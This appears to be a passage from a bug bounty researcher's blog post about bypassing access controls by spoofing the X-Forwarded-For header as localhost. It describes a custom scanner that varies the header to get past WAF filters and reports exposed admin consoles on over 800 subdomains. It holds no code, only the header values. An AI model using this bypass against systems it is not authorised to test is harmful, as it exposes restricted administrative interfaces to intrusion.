However the use-case that really got my attention was a variation of IP spoofing which causes the target web server to reveal information that it shouldn’t. I like to find vulnerabilities that most scanners aren’t configured to find and this I think is another one of these cases.

So IRCMaxwell experienced a situation where he unintentionally configured all of his outgoing http requests to include the X-Forwarded-For header configured with an ip address of 127.0.0.1 (the local host) – you can read his blog to find out how and why.

However this resulted in a situation where he discovered that StackOverflow was revealing parts of an administrative console to him that should not have been available for public viewing or access.

What was happening is that once the StackOverflow server recieved this request, it interpreted the “X-Forwarded-For: 127.0.0.1” to mean that webserver itself had initated the request, and that by implication, the requestor was authorised to see all the content available at that endpoint. IRCMaxwell was effectively masquarading as the webserver itself as far as the webserver was concerned.

I thought this was a pretty cool vulnerablity and so thought about how I could apply this to bug bounty targets.

So I wrote a tool which sends numerous requests to a target address with different variations of the XFF header localhost addressing to accommodate for cases where a WAF was blocking requests based on localhost signatures.

The tool uses heusristics to learn variations in the http response that could be indicative of additional sensitive information that is being disclosed.

As I developed this tool and scanned across hundreds of bug bounty targets I began to discover some interesting nuances. Web applications would handle and respond to XFF input very differently, resulting in some unexpected bug bounty leads.

However, the biggest win came early in the scanning when the tool discovered an admin console on a subdomain that is blocked to the public (response code 403), until you sent it a http request with an XFF header set to 127.0.0.1:80 at which point, the admin console became accessible.

After writing up the report – demonstrating the impact – it occurred to me that the same issue might occur on other subdomains of the parent domains.

After some searching I realised that not one subdomain, but two, no wait… over 800 subdomains for this particular organisation were impacted by the same issue. Each of these subdomains contained web applications, APIs or other services which were normally blocked to public access, but were bypassable using this technique!